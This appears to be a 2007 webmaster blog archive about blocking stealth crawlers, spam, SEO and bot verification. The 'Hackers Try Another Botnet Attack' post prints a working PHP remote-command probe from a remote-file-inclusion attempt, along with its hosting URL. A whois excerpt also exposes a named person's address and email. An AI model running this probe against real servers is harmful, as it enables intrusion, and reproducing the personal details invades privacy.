74.124.192.0 - 74.124.223.255

Corporate Colocation MZIMA01-CUST-CORPCOLO05
64.235.225.224 - 64.235.225.239

Corporate Colocation MZIMA01-CUST-CORPCOLO06
64.235.227.96 - 64.235.227.111

Corporate Colocation MZIMA01-CUST-CORPCOLO08
64.235.238.224 - 64.235.238.231

Corporate Colocation MZIMA01-CUST-CORPCOLO07
64.235.237.64 - 64.235.237.71

That little list of IPs should give you all some fun adding to your firewalls and .htaccess files.

Enjoy.

More Stealth Crawling Hosted at OC3Networks

No clue who or what this crawler is but it's coming from OC3Networks datacenter.

Here's the IPs and the user agent coming from their network:

72.11.155.106 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.112 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.113 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.125 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.131 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.137 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.154 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.197 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.204 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.211 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.219 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.223 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.228 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.236 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.237 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.246 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.34 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.37 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.45 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.5 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.57 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.61 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.63 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.64 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.67 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.90 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
Here's their ranges of IPs:
OC3 Networks & Web Solutions, LLC OC3-NETWORKS
66.63.160.0 - 66.63.191.255

OC3 Networks & Web Solutions, LLC OC3-NETWORKS
72.11.128.0 - 72.11.159.255

OC3 Networks ISWT-207-178-200-0
207.178.200.0 - 207.178.200.63

OC3 Networks OC3-NETWORKS-DSLUSERS
66.63.163.0 - 66.63.164.255

OC3 Networks OC3-NETWORKS--DEDICATED-SERVERS-RANGE
66.63.176.0 - 66.63.176.255

OC3 Networks OC3-NETWORKS--DEDICATED-SERVERS-RANGE
66.63.179.0 - 66.63.179.255

OC3 Networks OC3-NETWORKS---COLOCATIONS-VOIP
66.63.178.0 - 66.63.178.127
Not sure I'd block the DSLUSERS range but the rest look like fair game.

Enjoy.

Munax Stealth Crawler

Stumbled upon a stealth crawler hitting my site from multiple IPs and it turned out to belong to Munax who claims right up front that they haven't named their crawler and fake being a legit user which is pretty damned scummy.

My guess would be they figured out they couldn't access sites with good security so they decided to get around it without a bot name, but here's some bullshit excuse they use:

Our crawler does not have a "name", yet. Instead it announces itself to be a standard web browser, a "Mozilla 4.0" kind-of-browser compatible with the browser Microsoft Internet Explorer 6.0, running on the Windows NT 5.1 operating system. The reasons for this are: (a) Today, web servers are intelligent enough to react on the type of user agent. If our crawlers had a name, say MunaxRob or something like that, many web servers would not know about it and would return junk or maybe nothing at all. (b) We want the web server to return a page to us where the page looks as close as possible to a page that can be viewed with a standard web browser. This, to create the best possible indexing in our database and a WYSIWYG experience for anybody that is visiting our search engine.
Well listen up fuckheads, there's a reason we would return junk or nothing at all which is we don't want your goddamn spider crawling our fucking website!

What part of FUCK OFF! don't you understand that drives you to bypass our security and crawl regardless of whether we want you or not?

Amazingly they admit their IP range:
Your site might have been visited by our crawlers, with network addresses in the range of 82.99.30.2 - 82.99.30.73. Here is a short FAQ answering some of the questions you might have:
I've confirmed this crawl range in my logs:
82.99.30.15 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.17 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.21 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.25 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.26 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.30 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.33 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.37 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.45 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.54 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.67 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Well, this fucking crawler is now blocked.

Bunch of bullshit....

Sunday, October 28, 2007

Hackers Try Another Botnet Attack

Here we go again with the hackers making another run at one of my websites trying to inject PHP code into a site that doesn't even have PHP enabled which is amusing at best.

The script they were trying to inject was located here:

http://www.doncapone.com.br/.,/n?
Here's a copy of their PHP script for your viewing pleasure:
<?
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; // md5('xeQt');
echo "Uname:$ker<br>";
echo "SySOs:$osx<br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
?>
Here's a list of IP's with reverse DNS of the botnet involved with the attack so you can get an idea that any machine can be infected, it's pretty random:
121.119.172.33
newsclip.be

134.76.41.1
saturn.roentgen.physik.uni-goettingen.de.

195.14.56.16
netgenic.pac.ru.

195.205.77.30
bsd.page.pl.

195.77.190.208
www.medinalaboral.com.

198.189.237.157
garnet.csumb.edu.

200.89.153.204
gw0fibertel.tenroses.com.ar.

203.146.127.143
mail.wisetair.com.

203.146.129.149
not found: 3(NXDOMAIN)

203.81.43.130
130.128.43.81.203.in-addr.arpa.
mx1.mail.cliqo.com.

204.8.46.250
eaglemedia.com.

207.176.224.189
207-176-224-189.static-ip.ravand.ca.

207.44.178.47
mail.tmanshost.com.

208.101.13.198
server-center.net.

209.61.181.243
server4.sulek.net.

210.48.156.42
dns7.kutu.net.

211.62.35.151
not found: 3(NXDOMAIN)

212.110.119.85
www05.makolan.net.

212.174.113.76
mail.tros.gen.tr.

212.39.26.44
web22.hostdeck.com.

213.190.51.202
ns1.laisvas.lt.

213.218.141.11
caracas15.ecritel.net.

221.143.48.237
221-143-48-237.tongkni.co.kr.

222.231.2.50
b50.nskorea.com.

62.4.100.2
host.mantlik.cz.

64.91.251.107
nexus.sourcedns.com.

66.11.122.105
service66.11.122-105.serverprovider.com.

66.55.78.16
66-55-78-16.yourhostingprovider.net.

70.130.237.252
;; connection timed out; no servers could be reached

74.50.13.48
deneb.lunarpages.com.

81.173.242.33
gate.eyepower.de.

81.255.205.81
mail.chaffenay.com.

82.116.79.30
reseller.sircon.net.

82.195.230.142
gdp-lin-230-142.as16215.net.

82.67.222.122
bdy93-1-82-67-222-122.fbx.proxad.net.

85.13.194.179
cherryco.marketing-internet.com.

86.125.92.68
6-125-92-68.brasov.rdsnet.ro.

Pretty random list of sites infected with this botnet from locations throughout the world.

The bot blocker shut down all these attempts but I wonder what they'll try next time?

Kavam's SearchMe Charlotte Taking Screen Shots?

SearchMe has been around for a time but it looks like now they are taking screen shots.

For the novice looking at log files, any time you see FireFox for Linux that keeps methodically hitting pages over a long period of time you can almost assume with certainty that someone is making screen shots, especially when the IPs come from a data center.

Not only did I see screen shots being taken on my web pages, but I've seen their screen shot bot pulling images I have embedded on other web sites, so they're aggressively taking screen shots across the web.

Does the fact that they're taking screen shots mean that they're coming out of stealth mode and launching a new search service?

I'm speculating that this may be the case because taking screen shots is a very time consuming process and it wouldn't make sense to take screen shots and then let them all sit around aging and be totally out of date unless you intended to go public with some new search service soon.

Here's the screen shot activity to look for in your web logs:

209.249.86.17 - "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.5) Gecko/20070728 Firefox/2.0.0.5"
That IP belongs to:
Kavam MFN-T595-209-249-86-0-24 (NET-209-249-86-0-1)
209.249.86.0 - 209.249.86.255
Other activity in that IP range:
01/02/2007 "Mozilla/5.0 (compatible; Charlotte/1.0b; http://www.betaspider.com/)"

03/05/2007 "Mozilla/5.0 (compatible; Charlotte/1.0b; http://www.searchme.com/support/)"
Looks like Kavam is a legit company with funding and all that but making screen shots without changing the user agent to identify that's what they're doing is kind of lame. Very little is known about them other than they built Wikiseek, which has nothing to do with why they are attempting to crawl and screen shot my main web site, so they obviously have something new in the works.

I've decided to block them temporarily until they come out of stealth so I can see what they're up to because I don't need someone crawling a site with over 100K pages unless they give me a damn good reason ;)

Tuesday, October 23, 2007

Did NBCSearch Spam?

I've heard of NBCSearch and Mainstream Advertising before but never paid them any attention until 2 copies of the following showed up in my generic inboxes the other day, like sales, support, info, you know the things most companies have that you can randomly use to send email when you don't actually know a real email address.

Hello,

My name is Sarkis Arshakuni and I am the Director of Business Development here at NBCSearch, SearchABC, and the Mainstream Search Network of sites. I have heard great things about the capability of your network and I know we would benefit from working together.

I'm interested in pursuing a strategic partnership. Mainstream Search and it's family of sites make us the largest online advertising company. And with the success of TrueClick our click fraud detection technology we have been developing and growing relationships with several tier one search companies. We have broad coverage, high CPCs and the best 2nd tier traffic on the market.

Below is our XML Test Feed for your review:

http://carcassonne.ozemailer.com/[snip]

Feel free to paste this into a browser and change out the keyword so you can see the strength of our coverage and bid prices. Once you view these, I am confident you will want to begin ASAP. Here's our sign up link to get started:

http://carcassonne.ozemailer.com/[snip]


Please let me know if you have any questions or will be available for a quick chat about this partnership. I look forward to hearing from you or the appropriate person so we can explore further.


Thanks in advance,

Sarkis Arshakuni
Business Development
[snip]
________________________
http://www.Mainstreamadvertising.com
http://www.Mainstreamasearch.com
[snip]

Anyway, out of curiosity I went to NBCSearch and the McAfee SiteAdvisor went off, then I looked and they don't appear to be indexed in Google whatsoever, and of all things they have a private registration on their domain name which is odd for a corporation.
Domain Name: NBCSEARCH.COM

Registrant [207419]:
Moniker Privacy Services
Lot's of red flags so I think I'll skip inquiring about advertising.

But thanks for asking... not!

Saturday, October 06, 2007

Express Link or Spam Exchange?

Someone posted to my blog today about ExpressLinkExchange under the name Shanon Sandquist, who appears to have been quite busy lately.

Hey, this is an awesome blog you've
got here!! I'm definitely going to
bookmark it! By the way, I found a
awesome site that has similar kind of
link exchange kind of stuff! If you get
time, check it out.

www.ExpressLinkExchange.com

Posted by Shanon Sandquist to IncrediBILL's Random Rants at 10/06/2007 1:03 AM
Normally I would think it's a bogus name on one of those off topic blog posts but that name shows up in the WhoIs for ExpressLinkExchange so it's either the real person openly posting the same crap all over the place or someone trying to give them some reputation management issues.
whois expresslinkexchange.com

directNIC makes this information available "as is", and does not guarantee
its accuracy.

Registrant:
Homeworkers
2084 West, 12974 South
Riverton, UT 84065
US

Domain Name: EXPRESSLINKEXCHANGE.COM

Administrative Contact:
Sandquist, Shanon Shanon3@Walla.com
2084 West, 12974 South
Riverton, UT 84065
US

Technical Contact:
Sandquist, Shanon Shanon3@Walla.com
2084 West, 12974 South
Riverton, UT 84065
US

Domain servers in listed order:
NS1.MPENET.COM 65.222.14.2
NS2.MPENET.COM 65.222.14.3
Hey, it looks like a great service, what could be wrong with signing up for links and making free money?

Right on the home page "...increase a website's traffic, link popularity and search engine ranking..." and there's even a directory of member sites!

Here's the best part on the FAQ page:
5. Does ExpressLinkExchange.com abide by the major search engine guidelines?

Yes, it does. The ExpressLinkExchange.com Link Exchange service is fully compliant with all of the major search engine guidelines and standards. We do not promote "blackhat" techniques such as cloaking, hidden text, or the use of doorway pages in order to artificially manipulate the search engine results. The ExpressLinkExchange.com Link Exchange service will help naturally boost your website's link popularity in the same manner that any typical manual link exchange campaign would. The only difference with our system is that it is fully automated. In addition, we provide our members with helpful articles to educate them on how to properly optimize their web pages for increased search engine ranking. Click here for more details on this topic.
Interesting point of view because the Google Webmaster Guidelines expressly says:

Quality guidelines - basic principles

Don't participate in link schemes designed to increase your site's ranking or PageRank. In particular, avoid links to web spammers or "bad neighborhoods" on the web, as your own ranking may be affected adversely by those links.
OK, which one of them would you believe?

Well let's all sign right up so we'll all be in a members list Google can easily track, good idea!

Sounds like a plan to me!

Friday, October 05, 2007

SEO Means Squabbling Endlessly Online

The S in SEO stands for Squabbling because that's all they ever do, all day every day, Endlessly and Online.

What do they squabble about?

The usual crap, same thing they've been squabbling about for years about hat colors, search engine spamming and on and on ad nausea.

This week they're raking Rand over the coals because he outed a site selling paid links calling it "unprofessional". Sadly, Rand caved to peer pressure and removed the link to the outed site so he lost a little respect here because if you have an opinion and say something you feel righteous about, stick to your guns and stand behind it.

Besides, can anyone believe the same man that obviously flaunts fashion faux pas with the brightest yellow shoes just so you can see him a mile away at a search conference would give a rats ass about someone's opinion about outing a site?

I'm stunned.

The thing that stuns me even more is that the SEO community obviously wants these sites hidden from view because many of them use those paid links to game the search engines.

Think about this, you wouldn't want your favorite paid link juice site publicly outed would you?

Might cramp your style and you would have to do SEO the old fashioned way with a compelling site and content people naturally link to instead of gaming the system.

What did Rand really do wrong except expose a site violating Google's guidelines?

I think people were worried it would start an avalanche of outing paid link sites and they would quickly become a thing of the past.

Assuming Rand doesn't use those types of sites and doesn't live in a SEO glass house, I would stick to my guns because it's an educational thing for the novices out there to see and avoid, a public service actually, with a real live example of what Google's guidelines tell you not to do.

Doesn't matter what I think, Rand already caved, let the squabbling continue.

Department of Homeland Spam

A couple of days ago the DHS (Dept. of Homeland Security) turned out to be ironically running an insecure listserv to send email that resulted not only in a mini-DDoS of all it's list subscribers but culminated with a complete breach of all the email addresses on that list when they tried to fix it.

Flip wrote a hysterical play-by-play account of the DHS spam which is worth reading to the bitter end because it just gets worse and worse.

Makes me a little concerned about who's securing the Homeland Security!

Then I found a quote from one of the email's in his blog post that fingers the company responsible:

Please note that NICC is aware of the situation and has notified Computer Science Corp to disable the open server...
Also turns out not that it's not even a simple list server:
...Lotus Domino Release 7.0.2FP1 server hosted by a government contractor that reflects email to a list of thousands of subscribers
Can you imagine if this weakness was exposed during an actual crisis and people didn't get the information they needed in a timely manner?

I feel more secure now, don't you?

Wednesday, October 03, 2007

Debunking the FUD around "rel=nofollow"

I finally decided to put my thoughts in black and white and let people know why I think the Emperor G has no clothes which is why they invented "rel=nofollow" in the first place.

Think about how much we hear about relevance.

Relevant results are all the buzz in the relevance of Google's search results and targeting of AdSense ads so they must be the experts in relevance, right?

OK, if they have such a good lock on relevance then why couldn't Google simply determine that spam links from comments on blogs, forums and wikis had NO relevance to the topic of the post and simply discount those links automatically.

Once you grasp the implications of my last paragraph you'll realize that "rel=nofollow" is bogus.

If you're still not sure, think about this for just a moment with a simple scenario where Grandma posts on her crochet blog about a new crochet pattern and then a spammer spams her blog about Viagra or a bunch of other pharma and off topic crap.

Would we be led to believe that the world's greatest search engine with the best search relevance bar none can't tell that the link and comments about Viagra don't match the content of the blog post and can't automatically discount those links without a "rel=nofollow"?

Apparently not, and here comes "rel=nofollow" and all the FUD and fear mongering about who you link to, who you can sell links or legitimate ads to, and whether or not you can pass link juice or not without the risk being penalized if you don't bend to the will of the same company that ironically makes their billions selling paid links.

Does anyone besides me smell a hand job penalty for paid links?

If Google can't tell that the Viagra ad was off topic on Granny's Crochet blog then how are they detecting paid links?

With all that said I think "rel=nofollow" at a minimum is a good idea just to automatically discount random links from random people posting on blogs, forums and wikis just to take the possible SEO reward out spam. However, that won't stop the spam because the same stupid people that open those emails and go to those websites will still click the links in the spam posts as well so the direct traffic will still be a big enough incentive to continue spamming websites. The only upside is it thwarts their efforts to gain rank in the search engines.

However, if Google's relevance detection, especially with off topic links was really that good, the spam posts never would've been a problem in the first place.

Does anyone smell a rat?

Unfortunately the rat I smell is mixed content sites such as many news sites, forums and blogs with random topics per page that probably caused too many false positives for an algorithm to automatically discard what would appear to be off topic links.

Therefore, the algorithm probably failed and here we are scared into policing ourselves with "rel=nofollow" and every now and then someone caught selling a paid link or something is thrown on the sacrificial altar just to stir some high profile FUD and keep everyone in line.

That's my theory, what do you think?

Page Position Checking SEO Tools Waste Time and Money

The SEO community is always promoting page position checking tools all over the place but those tools are hardly useful and just part of the harmful hype that constantly surrounds the SEO business. Worse yet, they burn up your money paying for crap that most ultimately discard, waste time initializing the software per site, burn more time and bandwidth running them, and worse yet, these tools are against the Google Webmaster Guidelines. Since most SEO's don't give a rat's ass about doing things that are against the Google Webmaster Guidelines, until their sites get penalized in Google, we'll focus on why it's a waste of time and money.

Why would you possibly need a page rank checker?

  • Customer wants a position report.
  • Keeping an eye on the competition's ranking.
  • Don't know how to interpret traffic analytics.
  • Because everyone else does it.
Customer wants a page position report

There must be a motivating factor driving all of this rank checking mania, we'll call it money, because it certainly isn't common sense. I've never hired outside SEO but I'll bet customers get charged extra for these silly reports to cover the costs of the software or service they pay to create those reports.

The customer probably didn't know he needed a position report until some SEO claimed "Top 10 position guaranteed!" or something equally as silly which put that thought in his head in the first place. Now that the customer has that idea about a single position you need to either educate them about why it's garbage or spend time and money pounding the search engines running reports that put your money where your mouth is.

I would probably opt to educate the customer about what really matters and show increases in traffic and conversions and skip right past the silly rank checking. If you want to spend money wisely and help the customer spend it wisely as well invest in really good analytics and skip directly past page rank checking.

Unfortunately, we all know some customers will be fixated on ranking #1 for some term and won't see or appreciate the big picture in overall traffic improvements and will have a single-minded focus on that single keyword. Those are customers I would walk away from because anything short of achieving that goal and they'll never be happy and misery flows downhill. Run, do not walk, away from this situation.

Keeping an eye on the competition's ranking.

Considering that the bulk of the traffic usually comes from less than 30 keyword phrases (ok, I just picked 30 as a random number for discussion, your mileage may vary) it's pretty easy to eyeball these phrases in the search engines every now and then just to get an idea what the competitive landscape looks like. Spending tons of money on software just to track this competitive analysis is also silly because you know for a fact that when you improve your traffic and conversions on certain terms you're taking them away from someone. Likewise, if you lose traffic and conversions on certain terms you can typically assume someone is taking that traffic away from you and you can easily eyeball that term in the search engine to see where it went.

Don't know how to interpret traffic analytics.

Anyone that has ever run a web site for any length of time will realize that everything you'll ever need to know can be found in your log file analysis. If you rank well for a keyword or phrase you'll be getting a lot of traffic on that term and if you don't rank well, or at all, you won't get traffic for that term. Pretty simple to figure out what terms rank because everything that doesn't show up in your log files either doesn't rank or if it did rank, doesn't drive traffic because people don't search for that phrase so it's meaningless.

Learning how to properly understand the traffic to your site can seem a little overwhelming at first because not all traffic is good traffic. The easiest way to really understand where to focus your energy is tracking conversions to see which terms bring in the most customers that convert and then expand your search engine marketing around what I like to call "the phrase that pays".

Usually it's a lot of phrases but that's a different discussion for a different day.

I always recommend a combination of server side and service provider analysis tools as you need something that can analyze your raw server log files and it never hurts to use something free, especially if you're on a budget or not terribly technical, like Google Analytics as it's easy to install. Additionally, consider looking into some of the information provided by Google Webmaster Tools.

The main difference between a javascript-based analytics tool like Google Analytics and server side stats is that the javascript-based tools tend to only show real humans surfing the web. All the 'bots that crawl don't tend to be javascript capable which is why the two tools will show a huge discrepancy between your raw server logs and analytics services. Don't forget that many surfers disable javascript and run various ad blocking software which may also block your analytics tracker for privacy reasons. Therefore, the truth about your traffic lies somewhere in the middle of the raw server logs and a hosted analytics service but you usually can't go wrong basing decisions on the results of an analytics service.

Because everyone else does it.

That's not even a reason, that's an excuse.

This article wouldn't be complete if I didn't admit once upon a time, a long time ago, even I fell for the page position tracking trap and did it for almost 6 months before I realized I was wasting my time. Worrying about minor fluctuations are silly because the search engines are constantly in flux and your site may go up or down a little on various terms all the time, it's natural. However, if your site moves up or down a substantial amount on a term, your analytics will point this out just as well as the rank checker so it's completely redundant and doing the same job twice is obviously a waste of time and money.

That's why I abandoned checking my page positions years ago, increased my traffic more than I ever did looking at those silly reports, and both made and saved a lot of money in the process.

Summary

Skip the rank position checking except for manually eyeballing the search results every now and then for some top terms and invest heavily in analytics.

You'll be happier, you'll be focused on what really gets better results and you won't feel like a schmuck.

Wednesday, September 26, 2007

Cyberspider Crap-of-the-Day Bot Award

No clue what this spider does as it only asked for my home page but I know what it doesn't do, it doesn't ask for robots.txt.

Here's the 411 on this bad bot:

81.56.161.126 [veigy.globalitsolution.com.] requested 1 pages as "cyberspider"
These crappy crawlers just keep coming...

Double iPod Storage with iDoubler from Analog Magic

Found out an old friend of mine who's a real smart guy wrote some cool software to compress music files on an iPod. This iPod software tool of his called iDoubler uses some real high tech audio analysis processing to reduce the size of MP3 files and others in half, without compromising quality, thus doubling the amount of storage on your iPod or other music players.

Most of the music stored on my Zen is in MP3 format so even if I didn't put twice as many songs on the Zen, using iDoubler would cut the upload time in half.

Anyway, I just thought that it would be worth mentioning iDoubler for the rest of you out there that may, like me, still have a music player with 5GB or less so we can jam yet more into our old trusty music players until prices and sizes drop on those fancy 30GB devices.

Tuesday, September 25, 2007

CONTACT US Form Spammers STILL STUMPED!

It's been about 2 months since I implemented my last anti-spam form submit code and surprisingly the spammers were stopped dead this time and don't seem to have a clue how to get around it.

Without giving away all the secrets so the little pecker heads don't read this and figure it out, it's a combination of javascript in the browser and some server side tracking algorithms that seem to be able to detect the spam scripts very accurately.

Looking at my log today the spammers may have just given up on my site because the ton of failed posts no longer appears.

Here's a few highlights of the last anti-spam patch:

  • No captcha that a human must type as the javascript itself is the captcha
  • Browser and user agent validation
  • Data center blocking
  • Behavior profiling
The cute thing with the javascript captcha code is that it automatically builds a series of letters in a value that's posted back to the server. Each time something is entered into a field, meaning a human manually typing in a name, email address or comment, the javascript code adds another letter to the internal captcha string. Basically how it works is the human entering data into the form automatically creates the captcha answer returned as a form value.

The way the javascript is written it's nothing that happens the exact same way twice and the results are always different so I'm sure they gave up trying after a bit because the first wrong answer submitted and I froze the form from being used again. This stopped the spammers from hacking at the code as one wrong move and they were locked out for 24 hours before they could attempt it again.

Unfortunately, I might've locked out a couple of humans with javascript disabled as well but I can't tell as the volume of form submissions looks normal, no obvious decline, and the page clearly states that javascript must be enabled in order for the form to work.

I think a few minor casualties are acceptable for my peace of mind and less work cleaning up spammers messes.

Bye bye spammers, nice know'n ya!

Tuesday, September 04, 2007

Why FireFox is Misguidedly Blocked.

Went to read a blog this morning and was instead rudely redirected to some page with a bunch of hysterical bullshit about Why FireFox is Blocked.

The funny part is that in principle I agree with everything the page says about ad blocking being content theft but going to war against all FireFox users over this is fucking stupid.

People run ad blockers in Internet Explorer, why not block them too?

Most of the traffic is Internet Explorer so cutting of your traffic is stupid.

Why aren't they rallying against Norton Firewall which blocks all the same things by default?

That's another easy answer, because Norton Firewall users are a substantial amount of the traffic too but they can't easily detect a firewall. However, the FireFox user agent is an easy target to make a stand and piss off all the FireFox users and people are buying into this hype which is idiotic.

Hell, I'd suspect there are more people running ad blocking at the firewall level than there are copies of FireFox in actual use.

Will I do as they ask and go yell at Mozilla to take AdBlock Plus off the plug-in list?

Fuck no, it's fucking stupid.

However, what I might do is continue working on some ad blocking buster code that I started tinkering with because of Norton Firewall and ad blocking firewalls in general.

Shouldn't be that difficult to embed some javascript in the page that checks to see if Google AdSense created the iFrames for the ads or if the banners were actually loaded and punt the page elsewhere to a nice message telling people nicely:

YOUR BROWSER IS BLOCKING CONTENT FROM THIS WEBSITE.

PLEASE DISABLE BLOCKING TECHNOLOGY SO OUR PAGES WILL DISPLAY CORRECTLY.
Worded purposely to sidestep even discussing the fact that the blocked content was ads so it doesn't call direct attention to the ads and shouldn't violate the AdSense T&Cs.

You could just turn off javascript to stop any ad block checking but then the site navigation won't work because they're both in the same file.

Cute, eh?

Additionally, server side embedded ads seem to still work just fine so as long as you aren't serving up some 3rd party ads you can still show the ads.

Yes, your embedded ads COULD be blocked but the current filter technology requires a specific path or file name so as long as the image names vary constantly per banner and they appear to be served from the root path of the web site it's pretty hard to filter out with the existing technology.

The easiest way to defeat ad blockers which I've experimented with in the past is to simply make all the code server side. I once experimented with CJ's code by downloading the images to the server first and embedding them into the page directly, then redirecting clicks to the proper tracking location. The only 2 issues is that the impression tracking and 3rd party cookies didn't work well in that scheme, but it's obvious to me that a server side work around is possible that defeats all the ad blockers.

Don't expect to see server side code anytime soon though as most people operating a web site simply aren't capable of installing the code unless it comes pre-packaged as a blog or CMS module that can virtually install itself.

Remember, it's not a war on FireFox, it's a war on AD BLOCKERS, so get over the fact that FireFox has a plug-in, stop stupidly penalizing FireFox users, and start dealing with the root of the problem which is the blocking technology itself. Your ads can fly under ad blocking radar or stop visitors that don't download ads, your choice, but deal with the problem and not taking pot shots at a random poster child which in this case is FireFox.

Thursday, August 23, 2007

Proxy Phishing Warning - Avoid Proxies!

Here's another reason to avoid proxy servers as McAfee SiteAdvisor has been popping up warnings about potential phishing via these seemingly "harmless" proxy sites.

Maybe phishing is one of the real reasons behind the sudden proliferation of new proxy sites and not just so kids and workers can bypass internet security.

Maybe the real purpose of many of the sites popping up every few minutes is to lure unsuspecting victims into using their passwords and other personal information and collecting them for nefarious purposes.

It's also another possible reason that the proxy hacking/hijacking is being done as a means to purposely direct people to sites they may be members of, by hijacking the page in Google as a means to get you to login via their servers.

Some of the newer proxy sites I've seen attempting to hijack some of my pages lately have a very low profile, such as "http://000a.com/www.mysite.com" and don't even frame the page to give you any indication that you're even using a proxy other than the URL.

Everything is starting to add up to a very serious threat for novice internet users that can't tell they're even being spoofed.

I didn't like proxy sites before and now I think they should just be abolished because the risks are too high for site owners and visitors alike.

When it comes to proxy sites just play it safe and avoid them at all cost.

State of Spider Verification One Year Later

A year ago at SES in San Jose we made a big fuss about not being able to validate if the spiders were truly coming from the search engines or being spoofed.

At the time some people were maintaining lists of known valid spider IP addresses while others used to authorize entire ranges of IPs for various datacenters just in case they used new IPs which frequently happened.

Finally the big 4 search engines have all gotten on board implementing round trip DNS checking for spider verification with Google leading the pack back in September '06 right on the heels of SES San Jose.

Here's the implementation timeline:

08/06/06 - How to verify Googlebot on Google's Webmaster Central Blog


11/29/06 - Ask has round trip DNS support as well. Not sure of the exact date but it appears Ask beat out Microsoft based on a post on Matt Cutts Blog. I remember them mentioning this at one of the conferences last year, definitely PubCon at a minimum. If someone from Ask wants to give us an official date that would be nice.

11/29/06 - Search robots in disguise on Live Search team's blog. I remember when I asked the search engine panel at PubCon when they were going to follow Google's lead on this issue the Live Search guy's hand shot right up and said they already had it done.

Look at how quick and responsive 3 search engines were to webmaster complaints about spoofing issues.

...and barely getting it done before SES San Jose '07

06/05/07 - Yahoo! Search Crawler, Slurp, has a new Address and Signature Card on the Yahoo! Search Blog.

Better late then never and it would probably have been a big embarrassment had another year passed without keeping up with the competition.

Other spiders that appear to have implemented round trip DNS validation, to name a few off the top of my head, include Exabot, Furlbot, Twiceler, VoilaBot, even a few aggregators like BecomeBot and tailrank.com and a whole lot more so it's catching on.

Then you have stragglers like Gigabot that don't even bother setting any reverse DNS whatsoever and you have to do a whois on the IP address just to see if the IP block is assigned to their company or not. Come on people, get with the the program!

Obviously we still have a few search engines that need to catch up but at least all the major players can now be verified and a simple PHP script using round trip DNS verification can stop proxy hijackers and scrapers that spoof the search engines.

Wednesday, August 22, 2007

Google Dance 7 Kicked Butt

Did my annual pilgrimage to the Google Dance event last night that's associated with SES San Jose and had a pretty good time.

